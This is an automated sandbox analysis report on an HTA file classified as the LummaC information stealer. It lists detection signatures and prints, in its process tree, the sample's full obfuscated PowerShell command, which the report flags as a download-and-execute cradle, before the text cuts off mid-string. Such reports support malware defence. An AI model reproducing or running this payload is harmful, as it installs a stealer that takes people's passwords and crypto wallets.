Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new-riii-1-b.pub.hta

Overview

General Information

Sample name:new-riii-1-b.pub.hta
Analysis ID:1592081
MD5:43dd09be1f034e3f7f6232bc7e1d3b80
SHA1:bf085f00fd0a9cf51e0a580d9819367e345cace4
SHA256:3d1a4b9e37868f54e7e7eb98aae0203e2c50b2977170e0006cd3cbcb071c6b94
Tags:FakeCaptchaFakePubhtauser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 6232 cmdline: mshta.exe "C:\Users\user\Desktop\new-riii-1-b.pub.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 1600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQgA0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEAMgBaADcANwAwAGMANgBOAHoASABjAGoAbgBzADUAQwA0AFYAUQAwAGEAcgBjAHAANQBaAEMATwBjAEsAaABPAHgAeQBBAEMAVABFAEsAcABlAFUAbABMAHMAUQBiAE8ARgAxAFYAMABCAHIAcwA2AFEAbwBlAGcAZQBaAFkAbwBXAEkAYgBWAHcATQBJAEoAQwB4AEsATwBuADYAMwBpAE4AbQBFADYAYQBNAG4ARwBOADAAVQA3ADMATwB4AEgAUABGAEcAUwBjAG0AWgBlAHkAYQBqAEkAbAB3AEYAbABXAEQAbQB5ADAAagBGAEIAWgBoAHkAZABFAHMAaABUAHcAegBlAGkATQA3AGMANABrAGUAbwBTAFoAOAB1ADgAdQBrAGoAVAB1ADAAdgBQAG8ASABTAHoAMQBkAGUAWQAzAFUATgBtAG0AYgBzAHcAagBpAE8AUABuAGoAbQAwAGIANgAyAEEAMQBZAFgASAB0AFIAcQBaADkAQgBOAHkAegBqAFAAYQBpAHkANABrADgASABnADAAUQBFAEsANQB1AGUAbgBlAGEATQBOAFgAagA2AHcAdwBMADIAaQBIADMAdgAzAG8AdABtAFIAVgByAHgAdABIAHoAZQBNADEANgBXAHIAUwA1AEcAZABUAE4AeAB4AGEAcgBSAHYAegBnAGkAVwBZADcAYwBtAGYARgBjAFIAdQAxAHkAQgA2ADEAUAA2ADMAeQBIAEkAUgBsAEUAcQBQAEoARgBaADMAZgA5AHoAaAB3AFkAZwBHADMAYgBCAEgAcQA0AEcAagByAEMAawBuAFIAcABPAGsAbQBLAE4AMQBQAFYAdwBTAFAAZwBDAE8AbgBwAEsAeABYAEwARgBKAHMASQBxAEoAbwBUAEwASwBhAHMAQwAxAGgASQB1AE4ASgBvAGEAaABQAFEAYQBNADcATQBUAFMAdAB6ADcATAB6AEkAWgA0AEcAbwBmAFAARQByAFUAdQBRADgAbwAyAFcAZQBSAG4AQwBGADYAUwBHAFAANgA2AHYAbQA5AE4AdAByAEYAcwB6ADcAUwAwAEQASgBGAHEAcQB6AEUAcQB4AFoAdwBoAFMAQwBLAG8AQgBuAGkAZwA5ADMAMwBFAEEAQgBaAHAAaQBZAHYAYQA5AGUAdwBCAGsAOABnAEsAWABFAEUAbQBUAG8AOQBrAHoAWQBnAGMAaQBGAG4ARABCAGQAWgBMAG4AbABYAGsATABKADkAYgAxAHUAUwBSAEcATgB3AFUAdABMAHcAdwA1AFIAZAB4AHcAMwBhAHYAUQBnAHAAQgBNADcAMgB1AGkATQByAGIAWQBlAEYATgB3AE4ATABQAFUARQBtAGgAdQAwAE4AbABaADQAawBYAGoANQBFAHAANwBoADAAdQBkAHIAdAAxAEQAZwBMAHgAbQBTAGIAaAB4ADQAYgA1AGEAaAAxAFYAawBDADYAUwBnAGkAOQBhADYAcABpAEoAWQBIAGYAUwBHAEgAcgA4ADIAVgBPAG4AZgA1AEwAdABmAEUAVABBAGkAMQBWADYAMQA1AGoAWABvAHgATwBKADUATABUAG8ATgBCAEUAVQA2AEYAUwA2AHIASwBHAEMAYQBkAHkAdgBiADIAegBnAEgANABCAHEAcwAwAEsANQBYAHkAagBHAHcASQBQADAAYQBmAGgAMgBMAEYAZwAxADMAMABxAGsARQA0ADQAYQBUAGUANABCAHQAVgBuAEMAdABpAGQAZgBqAHQAdAA1AGkAUABwAFgAQQA5AHgAZwAxAGEAUwBOAHUAMQBXAFMAZwByAGcAMQBLAFYARwBSADgAcQB0ADkAUgBYAGMARQA5AHUAZwBqAGwAYQBBADMAQwBoADcAUABsAGgAYgBXAGUAQgBXAHgAQQBUAEMASQA5AGsAbABYADQAcQBjAEYAeAA1ADQAZwBVAHoATgBlAGsAVgBKAHYAdwB6AG8AMwBRAHUANQBYAHMAMwBiAGoARwBPADEAYgB3AEUASABkAG8AIAA9ACAAJAB0AFIAdQBFAA0ACgAkAEsAbAB3AFoAMgB2AFgANABDAEgAOQBlAGwAawA2AFYAOQBvADcAWQBSAEIATABFAHkANwBxAGgATgBFAHMAMQAzADMAcwBzAFIAegBJAGQAbwBPADcARABXADEAeAA0AG4AUgBTAEMAbQBlADgAaABlAFIAWgBmAGMAaABUADMATABrAEIAVwBoADkARABLAFMAUwBuAGUAbABqAHgAaQBuAE4AQwBvADUAbQBwAGkAegByAEMAcwBHAG4AVgBlAGoAcwA0AGgAWgBFADMATABQAFAAbwBTAE8AZwB1AEgASwBPAHIAaABJAHcAMABRADkARQBuAHEAZgBDAGUAeQBNAGgAUwB1AHAAZwB6AHUAMQAzAE4AYwA3ADQAWABOADkASQA1AFIANQBGAGYAVgA1AFEANQBGAG4AVAA4AGIAUgBtAGEANQBrAHMANQBPADkAZgBmAHcAaABVAE0ANgA5AGoAYgBBAFEAUABRAG0AcwBKAGgAWgB6AEsASgB4AGYAWgA1AFkAWQAzAFcASgBQAFAAdwBtADQAVgBTADQAcABQAHEARwAyAFMAWAB0ADcATQBSAEgAYQBwAHUASwBFAFgAdwB5AFcANQA4AE4ASAA2AGkAZQA3AE4ARAAxAHkATgBLAGoARQAgAD0AIAAkAE4AdQBMAGwADQAKACQATQBqADYAawB6ADIAZgBtAGcAegBPAEwANgBLAFIAMQBuAEcAUgBQAEwAUgA3ADYAdAAwAEcAQwA0AE4AYgBiAGYAVABaAEQAQwA4AGwAcwBiAFMAUwA5AHIAVQA2AG8AdgBpAHkATQBZAGEAeQBkAGEAdQB6ADYAMABhAGYAYgB2AEwAegBaAGUAVQBKAGQAcABhAGEAdQBzADcAQwAxAHgAbgBRAFAAVgBsAEIAOAA1AEIASQBHADUAZABSADYATQB5AGMAdABUAG8AVwBrAEYAWgBFAEQAMgBmAFIAVQBuAHoATQBkAE4AagA3AFAAVABFADEANQBnAE8AOABxAE0AOQBmAFMAagB6AGcAUwBMAGoAQwBCAHMAMABBAEgARQAzAFcANQBtAFEAZwBHADYARwA5AEoAbgBEAFAARABSAHMATwA1AGIAeQBEADYAZwB2AGsAWgBwAFgAUQBXAGEAcgB1AEsAQQBtAGkAZwByAE0AbwBhAEgAYgBLAHgANQA4AHUARgA0AHoANQBBAGsAZgA5AFQATwB4AHcAdgBFADAAegBSADIAMQBPAHUAWgBKAEoARgBrAHAAagB0ADcAMgBqAEUAcwA1AGgAUQBLAGkAUAB1AHIAWgA1ADgAaABlADMARQBIAFcAVQBkAFMAWgBtAGoAegBVAFEAbABjAFkAUQBJAE4AeABmAHgAeQBvAGEAbgA1AEUANgBXAGUAYwBqAHoAbABOAHIAZABBAHAAUAB6AEsATQBvAFcAWQB6AFYAcgBoAEoATgBWADgAMgBSADYAZgBVAHIAbgBHADYAOQA0AGoAbgBYADQASQBiAHMAdwBEADQASwBIAHUASwA1AHYAUwBCAG4AaABpAGsAbABpAEkAZQBXAFkASwB4AFIAbABGADIAcABRAGYAcABUAFEASQA3AEIAYQBoAGkAaABhAE4AbwBYAGkAMABoAGkAdABOAEQAVQBLAGkAQgBmAFQARAB0ADMAUABGAGMAWQBKAGYAZwBoAEYAdABnAHgAbAAxAEkAdQBCAGIAUQAzAGgAWAB1AGkARgBFAHgAcABUAFAAdwB6AEQAUwAyAHIAcABiADYAcQBuAFIAbABrAHEATQBOAGMATwB2AFAAWAB6AHgAdAB4AGMAawB5ADcAZgAwAEwAdABVAG4AbgB2AHgANABPAFIAVwBaAFIAdgAwAHgAQgBBAHYAOABlADYAdgBLAG4AZgBwAEoAUgA0AGYAeABwAGcAagBUAEYAUgB4AEcAZwA2AEkAMwA2AEsASwBJADgAcwBIADMAcgBCADcAegBmAFcANwA2AE8AVABCAFYANwBZAG4AMwBPAHAAMwBDAEoATQBNAHQAbQB6AEgASwBiADIAMgBtADgAbgBoAHcANABmAE8AbQBWAGMAZwB4AG0AWAA2AGUAVQBSAFIAZgAyAHAAbQBDAGgAcwBKAGkANwBCADUAdwBUAGgAMgBuADMAcAByADYAcgBvAGgASgBPAE8AUAA2AGsANgB0AE4AbABMADgAegBGAFQAcgBWAGwAaQBaAEQAdQBDAGkAMQBFAFAATwBTADMAcwBjADMAMQBtAFQATwAwAFgANQB0AFIAcABQAE4ATgBXAGMAdABGAEQAbQBSADAAdwBoAFkAdgB5AEsAbwBoAEQATAB4AHYAWABkAGgAZQAzADQAVABLAFoAeQB0AEMAdQB4AEoAegB4AGEAaQAxAHIAMABmAGwAUwBxAGsAcwBnAHEAUQBvAHEAUQAxAE0ARgBMAEkATABRAHkAdAA0AHoAVwBUAFYAbwBrAE0AcwBPAGYAQgBsAHIASgBuAE4ANQB5AGcAdQA0AFUAdgBhAGEAUwBFAGkAMgBOADIAWgBRAGkAVgAwAGQAdQB5AEQARgBRADgAMwBiAEcAOQBXAEEATABLAHIAYwA5AFMAVQBBAE0AZwBBAGMAdgB3AFAAVQBmAFQASwA2ADEAWQBjAHgAdABzAHYAVAB4AGcAWABJADUAeQBrAHkAZQB5AGEASQBVAGwAaQBhAFcAagBUAEEAcgA0AFUAbgBoAFgAWgBWAEMAegBBAHcAeABBAHQARQB4ADMAdABDAE4AUgBaAHAAUAB0AGsAUwAwAE8AYwBtAGcAawBHAEkAUQBKADEATABuAE0AQwBHAGsATwBFADMASwB2AGgAOQB4AGEANwByADMAcwBQADMASwBVAHkAUABiADIAVgBYAHIAMwBkAE0AbAB3AG0AaABIAHMARQBsAGUAZgA5AEkAWQBMAGQAYgBPADMAWAB5AFMAYwBYAGIAYwBEAE0AYQBqAGEAdABlAHQAdwB2ADYAagBEAGUASwBWADMAVQBPAGgAegBVAGQASwBXAHAANQAwAHMASQB0AEwAVwBxAHAAZABlAGQAdQBMAEoATgBsAFAAQgBIAG4AQgBhAFkAVQBCADgAVABLAGQAUwBSAHUAZwBBAEgAUABmAHcATABBAE8AeQBhAGoAQQBqACAAPQAiAEQAZQBmAGwAYQAiACAAKwAgACIAdABlAFMAdAByAGUAYQBtACIAOwAkAHUAdAAwAFQAawBaAFYASABiADcAQgAzADcARgBJAHgARgBSAEYAUgBDAGkAWABCAHkAaQBpAHMAZQAxAGIARwBmAFIAUQBWAHkASQA2ADgAUwBnAHMAWABUAGgATgA1AEwAawAwAHQAVABxAGEANgBBAGsAcQBuAEkAVQAwAEgAcAB2AHMAQQBmAFkAMABwAHgAbwBCADAAcABiAG0AQQBWAGsAUABrAEIAZQAyAE4AZgBjAHYAYgB6AEoAUgBnAHAAdABSAGcAbwBPAHEATwBHAHgAdQBxAGgARgBpADIAdgA3AEkAUABYAHgATABlAHUARQBpAGcAVgBpAHUAUQB1AFMAcgBvADcAcwBuAFAAUQA5ADYAUwBGAEQAZgB3AGgAZQBVAFQAQwA2ADYAegBZAEQAVABIADcAegBRAEUANgA1AE4AWgBSAFoAYQBpADIARwAzAGYAdgBWAFgAdgBkAHcAZgBjAHAAVgBaAHoAdQB0ADkANQBLAFUAaQBEADIASABIAGkAMABlAGUAMAB2ADAATwBiAEoARABKADIAMQBoAHgAUQBWAGEASABxAEgATgBtAFcAeQBTADIANwBLAGkAdgAzAHIAWQBFADQAZgBFAHIAVQBwAHAAcQBhADIAYgB1AHQAYwBxAFMANgBrAHUAZQBGAHkATgBaADgAVABpAE4AcgBtAHcAVABGAHYAMgBpAFUARABmAHQATQBqADUAcwBwAHkAZwAzADQAWABmADgAagBrAGIAbQB6AFkAZAA5AFUANgBCAGcAcQA0AGsAMABXAEEARwByAFAAawBKAE4AeABQADYATwAxADYAbwBBAGkAUgBSAFEAYQBrAHgAZABRAG8ANwBsAEcAbABrAFEAQgBFADkARgBOADgAcwBpAHoATgBPAFcAVQBUADMAdABkAHUASgBIAGgAWAA1AGQASgBrAEQASQBNAFQAMwBaAGsAWABmAGoAUgBnADcAMQBOAGYAMQB0AG0AawB4AGcAMgBDADIANQBtAFIAUgBNAEEAZwBYAHAAbABJAEsAZgA4AGUAdgBiADIAWAB2AFIATABJAFoARgBlAGcAcgBqAHkAcQBwAEUANwBwADIAdABtAHIANQBCAHMAVQBIADgATQByAGsAZABaAEsATgAxAHQAZwBEAGQAQwBEAFEAWABWAE4ATwBDAGkAWgA0AHIAWgBUAGUAVQByAHQASgB4AHoAUAA4AGcAWAB0AGkASwB2AEQAOQBHAGUAQgBNAEMARgAzAGQAdgBZAGEAMwBvAEoAVwBTAGcARAB0AFQARABUAEgARwBUAHoAcABiAEsAaABjAGoAcQBVAGsASQBxAGYAMwAxAEoAVwBiAHYAVQB6AFUAcQBTAEoAYwBSAHUARgBzAEcAWQBVAEwATgBFAEIAWABKAFkAMgB1AG0AdABLAG4AbgBRAHAAWAA4AFAAMgBKAG8AbABFAHgARgA3AHIAbABMADUASQA0AGwAcQBCAEQAbwBlAFMAOABjAEEAYQBzAEoASgA5AHkAYQBYAEYASQBPADIAOQBQACAAPQAgACIAQwBvAG0AcAByAGUAIgAgACsAIAAiAHMAcwBpAG8AbgAiADsAIAAkAEsAUQBrAHMAcQA3AFgAbwBVAHMAVwBxADAARABhAGMAVQBiADMAbABCAEgAbwBSAEIAWgB5AHEAdgBnAGUAQQBLAFAAagBQAHEASQBqAEoAVgBRAGYAMwBrADMAegBMAFkAVwBaAE0AZwBiADkAbQBtAFgASgBXADMAZgBmAHYAQQB0AGkAegB4AE8AZQBtAHMASQA1AHIAaQBSAHQAbQAwAFUAZABWAFoAagBSAGkAOQBLAFAAMQBvAHkASABrADQAagAwAFQAZQB3AFIANQBaAHYAVwA5AE0ANgBNAGkANQBkAEgATAB4AFgAdABQAGgAbABtAHgAUQBVAFoAOQBxAE8AZABDAFYARQBCAGcAYgBNAEIAcgBqAEMASABvAHUAMgA0AFMAWABOAEIAaQBZAEQAZgBCAGYAdQBHADkAZABSAFAAbQBlAFQAVwAxADgAUgBYAHkASQB4AHkAVwBHAEwAagBXAEsAcgBkAEoAVgBDADYAaQBTAHIAVwBCAEUAbQBwADEANgBYADgASABmAHAAVABjADMAQwBkAFYAUgBVAG0AcQA4AFAAdABxAGEAQQBHAE4ATQBrAEwAbABlAFAAbwBSAHYAWABoAE8AZQBiAEgAeABEAG8AcQBJAHMAdQByAGgAYwB1AEYANABlAE4ASgBiAG8AUwBNAGMASgBZAHIAOABJAHoAZgBmAEIASwAzADQAeQA4AEUAYQBWAHgAZwBHAHgAMABjAEMAQQBQAGUAVgBMAEMAOQBqAEQAOAAzAGUAagBSAGsAMQBTAEEAMgBHAFAAbABGAG8AeQBzAGoAeQBVAFAAcQBwAHAAZwBLAHMATwBWADAARQBTAGIAZAAzAG4AcAB4ADQAVwBDAEcARAA5ADMATABuAFkAcwBwADkAQQBQAGMAYwBBAHYARQB0AHoAVABNAEQATwBOAGIAegB4AGMAZgBKAEsAdgBRAHgAQwBEAGoARgBEAGoAZQBBAGoARgA0AHoAOAA4AHkANQBiAEUAeAAgAD0AIgBTAHQAcgBlAGEAIgAgACsAIAAiAG0AUgBlAGEAZABlAHIAIgA7ACAALgAoACIAaQAiACsAIgBlAHgAIgApACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgAkAEsAcQBLAFMAUQA3AFgAbwB1AHMAVwBRADAAZABBAGMAdQBiADMAbABCAGgAbwByAEIAWgBZAHEAdgBnAGUAQQBrAFAASgBwAHEASQBqAEoAVgBRAEYAMwBrADMAegBMAHkAdwBaAG0AZwBiADkAbQBtAFgAagB3ADMARgBmAFYAQQB0AEkAWgBYAE8ARQBtAFMASQA1AHIASQByAHQAbQAwAFUARABWAFoAagByAEkAOQBrAFAAMQBvAFkASABrADQASgAwAFQARQB3AFIANQBaAHYAVwA5AG0ANgBNAGkANQBkAGgATABYAFgAdABQAEgAbABtAHgAUQB1AHoAOQBxAG8AZABjAHYAZQBCAGcAQgBNAGIAcgBqAGMAaABvAHUAMgA0AHMAeABOAEIAaQBZAGQARgBCAEYAVQBHADkARABSAFAAbQBlAFQAVwAxADgAcgB4AFkAaQB4AFkAVwBnAEwASgBXAEsAUgBEAGoAVgBDADYASQBzAHIAVwBCAGUATQBQADEANgBYADgASABmAFAAVABDADMAYwBkAFYAcgB1AG0AUQA4AHAAdABxAEEAQQBHAG4AbQBrAGwAbABFAHAATwBSAFYAeABIAE8AZQBiAEgAeABEAE8AcQBJAFMAdQByAGgAYwB1AGYANABFAE4AagBCAE8AcwBtAGMAagB5AHIAOABpAHoARgBmAEIASwAzADQAWQA4AEUAQQBWAHgARwBnAHgAMABDAGMAQQBQAEUAdgBsAEMAOQBKAGQAOAAzAEUAagByAGsAMQBTAEEAMgBHAFAATABGAE8AeQBzAEoAWQB1AHAAUQBQAHAAZwBrAFMATwBWADAARQBzAGIARAAzAE4AUAB4ADQAdwBjAEcARAA5ADMATABOAFkAcwBQADkAQQBwAGMAYwBBAHYARQBUAHoAVABNAGQAbwBuAEIAWgBYAEMAZgBqAGsAVgBRAFgAYwBEAGoARgBEAEoAZQBhAGoARgA0AFoAOAA4AFkANQBCAEUAWAAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAG8ALgAkAFUAVAAwAFQASwBaAFYASABCADcAYgAzADcARgBJAHgARgBSAEYAUgBjAEkAWABCAFkAaQBpAFMARQAxAEIAZwBmAHIAUQBWAFkASQA2ADgAUwBnAHMAeAB0AEgAbgA1AGwAawAwAFQAdABxAGEANgBhAEsAUQBuAGkAdQAwAGgAcAB2AHMAYQBmAFkAMABwAHgAbwBCADAAUABiAE0AYQBWAGsAcABLAGIARQAyAE4ARgBjAFYAQgBaAGoAUgBHAHAAdAByAGcATwBvAFEATwBHAFgAVQBRAGgARgBJADIAdgA3AEkAcAB4AFgATABlAHUAZQBJAEcAdgBpAFUAUQBVAHMAcgBvADcAUwBuAFAAcQA5ADYAcwBGAGQARgBXAEgAZQBVAHQAQwA2ADYAWgBZAGQAdABoADcAWgBxAGUANgA1AE4AegBSAHoAQQBJADIARwAzAGYAVgBWAHgAdgBkAHcARgBjAHAAVgB6AHoAVQBUADkANQBLAFUAaQBkADIASABIAEkAMABlAGUAMAB2ADAATwBiAGoARABKADIAMQBoAHgAUQB2AEEAaABRAEgAbgBtAFcAWQBzADIANwBLAGkAVgAzAHIAWQBlADQARgBFAHIAVQBQAHAAcQBBADIAQgBVAFQAQwBxAHMANgBLAFUARQBGAFkATgBaADgAVABpAG4AUgBtAFcAVABmAHYAMgBpAHUARABGAHQAbQBqADUAcwBQAHkARwAzADQAWABmADgASgBLAGIATQBaAHkAZAA5AHUANgBiAEcAUQA0AEsAMABXAEEAZwBSAFAAawBqAE4AeABwADYATwAxADYATwBhAGkAUgByAFEAYQBrAHgARABxAG8ANwBsAEcAbABrAHEAYgBFADkAZgBuADgAcwBJAFoAbgBPAFcAVQB0ADMAVABkAHUAagBIAGgAWAA1AGQAagBLAEQAaQBNAFQAMwBaAEsAWABGAGoAcgBnADcAMQBOAGYAMQBUAE0AawBYAEcAMgBjADIANQBNAFIAUgBNAGEAZwB4AHAATABJAEsAZgA4AGUAVgBCADIAeAB2AHIATABpAFoARgBFAEcAcgBqAFkAcQBwAGUANwBwADIAVABtAHIANQBCAHMAVQBIADgATQBSAEsARAB6AGsAbgAxAFQAZwBkAEQAYwBkAFEAeABWAG4ATwBjAGkAWgA0AFIAWgB0AGUAVQBSAFQAagB4AFoAUAA4AGcAWAB0AEkAawB2AGQAOQBHAEUAYgBtAEMAZgAzAGQAdgB5AGEAMwBPAEoAVwBTAGcAZABUAHQAZAB0AGgAZwB0AFoAUABiAGsAaABjAGoAUQB1AGsASQBxAGYAMwAxAGoAVwBiAFYAdQBaAFUAUQBTAGoAYwBSAFUAZgBTAEcAeQBVAEwAbgBlAGIAeABKAHkAMgB1AE0AVABLAE4AbgBRAFAAWAA4AHAAMgBKAE8ATABlAFgARgA3AHIATABMADUAaQA0AEwAUQBCAGQAbwBFAHMAOABjAEEAYQBzAGoAagA5AFkAYQBYAGYAaQBPADIAOQBQAC4AJABtAGoANgBrAHoAMgBmAE0AZwBaAG8ATAA2AGsAcgAxAG4ARwByAFAAbAByADcANgB0ADAAZwBDADQAbgBCAEIARgB0AHoAZABjADgATABTAEIAUwBTADkAcgBVADYAbwBWAEkAeQBNAFkAYQBZAGQAYQBVAFoANgAwAGEAZgBCAHYATABaAFoAZQB1AEoARABwAEEAQQB1AHMANwBjADEAeABuAHEAUABWAGwAQgA4ADUAQgBpAEcANQBkAFIANgBNAFkAQwBUAHQATwBXAEsAZgBaAEUARAAyAEYAUgB1AG4AegBtAGQAbgBKADcAcAB0AGUAMQA1AGcAbwA4AFEATQA5AEYAcwBKAFoARwBzAEwAagBjAEIAUwAwAEEASABlADMAdwA1AG0AUQBnAEcANgBnADkASgBuAGQAcABEAFIAcwBPADUAQgBZAEQANgBHAFYAawBaAFAAWABxAFcAQQBSAHUASwBBAE0AaQBHAFIATQBvAEEASABiAGsAWAA1ADgAVQBGADQAWgA1AEEASwBGADkAVABPAHgAVwBWAGUAMABaAFIAMgAxAE8AdQBaAEoASgBGAGsAcABKAFQANwAyAGoAZQBzADUASABxAGsAaQBQAFUAUgBaADUAOABoAGUAMwBlAEgAVwB1AGQAUwB6AG0AagB6AFUAUQBsAGMAeQBxAGkAbgBYAGYAeAB5AE8AQQBOADUARQA2AFcAZQBDAGoAegBsAE